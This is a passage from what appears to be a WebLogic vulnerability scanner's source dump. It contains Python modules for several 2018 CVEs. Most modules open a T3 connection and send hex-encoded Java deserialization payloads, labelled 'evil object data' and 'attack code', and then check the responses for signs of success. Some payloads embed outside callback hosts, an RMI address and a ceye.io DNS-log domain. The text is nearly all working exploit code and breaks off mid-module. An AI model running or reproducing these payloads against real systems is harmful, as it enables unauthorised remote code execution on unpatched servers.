44 |         data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
45 |         data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format(
46 |             '{:04x}'.format(dport))
47 |         data3 = '1a7727000d3234322e323134'
48 |         data4 = '2e312e32353461863d1d0000000078'
49 |         for d in [data1, data2, data3, data4]:
50 |             sock.send(bytes.fromhex(d))
51 | 
52 |         # send evil object data
53 |         payload = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
54 |         # -------- attack code start --------
55 |         payload += 'aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707729000a556e69636173745265660000000005a2000000005649e3fd00000000000000000000000000000078'
56 |         # --------- attack code end ---------
57 |         payload += 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
58 |         payload = '%s%s' % ('{:08x}'.format(len(payload) // 2 + 4), payload)
59 |         sock.send(bytes.fromhex(payload))
60 |         time.sleep(delay)
61 |         try:
62 |             res = sock.recv(4096)
63 |             r = re.search(b'\\$Proxy[0-9]+', res)
64 |             return not r is None, {'msg': 'finish.'}
65 |         except socket.timeout:
66 |             return False, {'msg': 'connection timeout.'}
67 | 
68 | 
69 | def run(queue: SyncManager.Queue, data: Dict):
70 |     obj = CVE_2018_2628()
71 |     result = {
72 |         'IP': data['IP'],
73 |         'PORT': data['PORT'],
74 |         'NAME': obj.info['CVE'] if obj.info['CVE'] else obj.info['NAME'],
75 |         'MSG': '',
76 |         'STATE': False
77 |     }
78 |     result['STATE'], result['MSG'] = obj.light_and_msg(
79 |         data['IP'], data['PORT'], data['IS_SSL'])
80 | 
81 |     queue.put(result)
82 | 


--------------------------------------------------------------------------------
/stars/cve_2018_2893.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # _*_ coding:utf-8 _*_
 3 | # CVE-2018-2893
 4 | # 该漏洞不会直接回显
 5 | # updated 2019/11/1
 6 | # by 0xn0ne
 7 | 
 8 | import socket
 9 | import time
10 | from multiprocessing.managers import SyncManager
11 | from typing import Any, Dict, List, Mapping, Tuple, Union
12 | 
13 | from stars import target_type, Star
14 | 
15 | 
16 | # @universe.groups()
17 | class CVE_2018_2893(Star):
18 |     info = {
19 |         'NAME': '',
20 |         'CVE': 'CVE-2018-2893',
21 |         'TAG': []
22 |     }
23 |     type = target_type.VULNERABILITY
24 | 
25 |     def light_up(self, dip, dport, force_ssl=None, delay=2, timeout=5, *args, **kwargs) -> (bool, dict):
26 |         # 对端响应数据需要一段时间，使用 delay 来控制，如果不成功，可以加到 3s 左右，超过这个基本都是打了补丁的
27 |         # t3 handshake
28 |         dport = int(dport)
29 |         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
30 |         sock.settimeout(timeout)
31 |         try:
32 |             sock.connect((dip, dport))
33 |         except socket.timeout:
34 |             return False, {'msg': 'connection timeout.'}
35 |         except ConnectionRefusedError:
36 |             return False, {'msg': 'connection refuse.'}
37 |         sock.send(bytes.fromhex(
38 |             '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
39 |         time.sleep(delay)
40 |         sock.recv(1024)
41 | 
42 |         # build t3 request object
43 |         data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
44 |         data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format(
45 |             '{:04x}'.format(dport))
46 |         data3 = '1a7727000d3234322e323134'
47 |         data4 = '2e312e32353461863d1d0000000078'
48 |         for d in [data1, data2, data3, data4]:
49 |             sock.send(bytes.fromhex(d))
50 | 
51 |         # send evil object data
52 |         payload = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
53 |         # -------- attack code start --------
54 |         payload += 'aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000001251e200000000000000100000118aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e310000f1440000000046911fd80000000000000000000000000000007878'
55 |         # --------- attack code end ---------
56 |         payload += 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
57 |         payload = '%s%s' % ('{:08x}'.format(len(payload) // 2 + 4), payload)
58 |         sock.send(bytes.fromhex(payload))
59 |         time.sleep(delay)
60 |         try:
61 |             res = sock.recv(4096)
62 |             return b'weblogic.jms.common.StreamMessageImpl' in res, {'msg': 'finish.'}
63 |         except socket.timeout:
64 |             return False, {'msg': 'connection timeout.'}
65 | 
66 | 
67 | def run(queue: SyncManager.Queue, data: Dict):
68 |     obj = CVE_2018_2893()
69 |     result = {
70 |         'IP': data['IP'],
71 |         'PORT': data['PORT'],
72 |         'NAME': obj.info['CVE'] if obj.info['CVE'] else obj.info['NAME'],
73 |         'MSG': '',
74 |         'STATE': False
75 |     }
76 |     result['STATE'], result['MSG'] = obj.light_and_msg(
77 |         data['IP'], data['PORT'], data['IS_SSL'])
78 | 
79 |     queue.put(result)
80 | 


--------------------------------------------------------------------------------
/stars/cve_2018_2894.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # _*_ coding:utf-8 _*_
 3 | # CVE-2018-2894
 4 | # updated 2019/10/23
 5 | # by 0xn0ne
 6 | 
 7 | from stars import target_type, Star
 8 | from utils import http
 9 | from multiprocessing.managers import SyncManager
10 | from typing import Any, Dict, List, Mapping, Tuple, Union
11 | 
12 | 
13 | # @universe.groups()
14 | class CVE_2018_2894(Star):
15 |     info = {
16 |         'NAME': '',
17 |         'CVE': 'CVE-2018-2894',
18 |         'TAG': []
19 |     }
20 |     type = target_type.MODULE
21 | 
22 |     def light_up(self, dip, dport, force_ssl=None, *args, **kwargs) -> (bool, dict):
23 |         url = 'http://{}:{}/wsutc/begin.do'.format(dip, dport)
24 |         b_res, data = http(url, ssl=force_ssl)
25 |         url = 'http://{}:{}/ws_utc/config.do'.format(dip, dport)
26 |         c_res, data = http(url, ssl=force_ssl)
27 |         if (b_res and b_res.status_code == 200) or (c_res and c_res.status_code == 200):
28 |             return True, {'msg': 'finish.'}
29 |         return False, {'msg': 'finish.'}
30 | 
31 | 
32 | def run(queue: SyncManager.Queue, data: Dict):
33 |     obj = CVE_2018_2894()
34 |     result = {
35 |         'IP': data['IP'],
36 |         'PORT': data['PORT'],
37 |         'NAME': obj.info['CVE'] if obj.info['CVE'] else obj.info['NAME'],
38 |         'MSG': '',
39 |         'STATE': False
40 |     }
41 |     result['STATE'], result['MSG'] = obj.light_and_msg(
42 |         data['IP'], data['PORT'], data['IS_SSL'])
43 | 
44 |     queue.put(result)
45 | 


--------------------------------------------------------------------------------
/stars/cve_2018_3191.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # _*_ coding:utf-8 _*_
 3 | # CVE-2018-3191
 4 | # 该漏洞不会直接回显
 5 | # updated 2019/12/12
 6 | # by 0xn0ne
 7 | 
 8 | import socket
 9 | import struct
10 | import time
11 | from multiprocessing.managers import SyncManager
12 | from typing import Any, Dict, List, Mapping, Tuple, Union
13 | 
14 | from stars import target_type, Star
15 | 
16 | 
17 | # @universe.groups()
18 | class CVE_2018_3191(Star):
19 |     info = {
20 |         'NAME': '',
21 |         'CVE': 'CVE-2018-3191',
22 |         'TAG': []
23 |     }
24 |     type = target_type.VULNERABILITY
25 | 
26 |     def light_up(self, dip, dport, force_ssl=None, delay=2, timeout=5, *args, **kwargs) -> (bool, dict):
27 |         # 对端响应数据需要一段时间，使用 delay 来控制，如果不成功，可以加到 3s 左右，超过这个基本都是打了补丁的
28 |         # t3 handshake
29 |         dport = int(dport)
30 |         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
31 |         sock.settimeout(timeout)
32 |         try:
33 |             sock.connect((dip, dport))
34 |         except socket.timeout:
35 |             return False, {'msg': 'connection timeout.'}
36 |         except ConnectionRefusedError:
37 |             return False, {'msg': 'connection refuse.'}
38 |         sock.send(bytes.fromhex(
39 |             '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
40 |         time.sleep(delay)
41 |         sock.recv(1024)
42 | 
43 |         # build t3 request object
44 |         data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
45 |         data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format(
46 |             '{:04x}'.format(dport))
47 |         data3 = '1a7727000d3234322e323134'
48 |         data4 = '2e312e32353461863d1d0000000078'
49 |         for d in [data1, data2, data3, data4]:
50 |             sock.send(bytes.fromhex(d))
51 | 
52 |         # send evil object data
53 |         payload = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
54 |         # -------- attack code start --------
55 |         payload += 'ACED00057372004D636F6D2E6265612E636F72652E72657061636B616765642E737072696E676672616D65776F726B2E7472616E73616374696F6E2E6A74612E4A74615472616E73616374696F6E4D616E616765724EF3ECFBB628982F0200085A001A616C6C6F77437573746F6D49736F6C6174696F6E4C6576656C735A001C6175746F6465746563745472616E73616374696F6E4D616E616765725A00196175746F646574656374557365725472616E73616374696F6E5A00146361636865557365725472616E73616374696F6E5A001F757365725472616E73616374696F6E4F627461696E656446726F6D4A6E64694C00167472616E73616374696F6E4D616E616765724E616D657400124C6A6176612F6C616E672F537472696E673B4C00267472616E73616374696F6E53796E6368726F6E697A6174696F6E52656769737472794E616D6571007E00014C0013757365725472616E73616374696F6E4E616D6571007E00017872005E636F6D2E6265612E636F72652E72657061636B616765642E737072696E676672616D65776F726B2E7472616E73616374696F6E2E737570706F72742E4162737472616374506C6174666F726D5472616E73616374696F6E4D616E6167657235F8D3063ABC94C402000749000E64656661756C7454696D656F75745A001D6661696C4561726C794F6E476C6F62616C526F6C6C6261636B4F6E6C795A0024676C6F62616C526F6C6C6261636B4F6E50617274696369706174696F6E4661696C7572655A00186E65737465645472616E73616374696F6E416C6C6F7765645A0017726F6C6C6261636B4F6E436F6D6D69744661696C75726549001A7472616E73616374696F6E53796E6368726F6E697A6174696F6E5A001B76616C69646174654578697374696E675472616E73616374696F6E7870FFFFFFFF00010100000000000000010101007070740016726D693A2F2F382E382E382E383A38302F696E646578'
56 |         # --------- attack code end ---------
57 |         payload += 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
58 |         payload = bytes.fromhex(payload)
59 |         payload = struct.pack('>I', len(payload)) + payload[4:]
60 |         sock.send(payload)
61 |         time.sleep(delay)
62 |         try:
63 |             res = sock.recv(4096)
64 |             return b'weblogic.rjvm.ClassTableEntry' in res, {'msg': 'finish.'}
65 |         except socket.timeout:
66 |             return False, {'msg': 'connection timeout.'}
67 | 
68 | 
69 | def run(queue: SyncManager.Queue, data: Dict):
70 |     obj = CVE_2018_3191()
71 |     result = {
72 |         'IP': data['IP'],
73 |         'PORT': data['PORT'],
74 |         'NAME': obj.info['CVE'] if obj.info['CVE'] else obj.info['NAME'],
75 |         'MSG': '',
76 |         'STATE': False
77 |     }
78 |     result['STATE'], result['MSG'] = obj.light_and_msg(
79 |         data['IP'], data['PORT'], data['IS_SSL'])
80 | 
81 |     queue.put(result)
82 | 


--------------------------------------------------------------------------------
/stars/cve_2018_3245.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # _*_ coding:utf-8 _*_
 3 | # CVE-2018-3245
 4 | # 这个漏洞超时次数会比较多，非常不稳定，建议多做尝试。最多一次尝试了 24 次
 5 | # updated 2019/12/05
 6 | # by 0xn0ne
 7 | 
 8 | import socket
 9 | import struct
10 | import time
11 | from multiprocessing.managers import SyncManager
12 | from typing import Any, Dict, List, Mapping, Tuple, Union
13 | 
14 | from stars import target_type, Star
15 | 
16 | 
17 | # @universe.groups()
18 | class CVE_2018_3245(Star):
19 |     info = {
20 |         'NAME': '',
21 |         'CVE': 'CVE-2018-3245',
22 |         'TAG': []
23 |     }
24 |     type = target_type.VULNERABILITY
25 | 
26 |     def light_up(self, dip, dport, force_ssl=None, delay=0.5, timeout=5, *args, **kwargs) -> (bool, dict):
27 |         # 对端响应数据需要一段时间，使用 delay 来控制，如果不成功，可以加到 3s，超过这个基本都是打了补丁的
28 |         # t3 handshake
29 |         dport = int(dport)
30 |         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
31 |         sock.settimeout(timeout)
32 |         try:
33 |             sock.connect((dip, dport))
34 |         except socket.timeout:
35 |             return False, {'msg': 'connection timeout.'}
36 |         except ConnectionRefusedError:
37 |             return False, {'msg': 'connection refuse.'}
38 |         sock.send(
39 |             b't3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n')
40 |         sock.recv(1024)
41 | 
42 |         # send evil object data
43 |         payload = b'\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
44 |         # -------- attack code start --------
45 |         payload += b'\xAC\xED\x00\x05\x73\x72\x00\x2F\x63\x6F\x6D\x2E\x73\x75\x6E\x2E\x6A\x6E\x64\x69\x2E\x72\x6D\x69\x2E\x72\x65\x67\x69\x73\x74\x72\x79\x2E\x52\x65\x66\x65\x72\x65\x6E\x63\x65\x57\x72\x61\x70\x70\x65\x72\x5F\x53\x74\x75\x62\x00\x00\x00\x00\x00\x00\x00\x02\x02\x00\x00\x78\x72\x00\x1A\x6A\x61\x76\x61\x2E\x72\x6D\x69\x2E\x73\x65\x72\x76\x65\x72\x2E\x52\x65\x6D\x6F\x74\x65\x53\x74\x75\x62\xE9\xFE\xDC\xC9\x8B\xE1\x65\x1A\x02\x00\x00\x78\x72\x00\x1C\x6A\x61\x76\x61\x2E\x72\x6D\x69\x2E\x73\x65\x72\x76\x65\x72\x2E\x52\x65\x6D\x6F\x74\x65\x4F\x62\x6A\x65\x63\x74\xD3\x61\xB4\x91\x0C\x61\x33\x1E\x03\x00\x00\x78\x70\x77\x39\x00\x0A\x55\x6E\x69\x63\x61\x73\x74\x52\x65\x66\x00\x10\x64\x30\x32\x7A\x6D\x78\x2E\x63\x65\x79\x65\x2E\x69\x6F\x00\x00\x00\x50\x00\x00\x00\x00\x13\x8E\xF9\xD2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78'
46 |         # --------- attack code end ---------
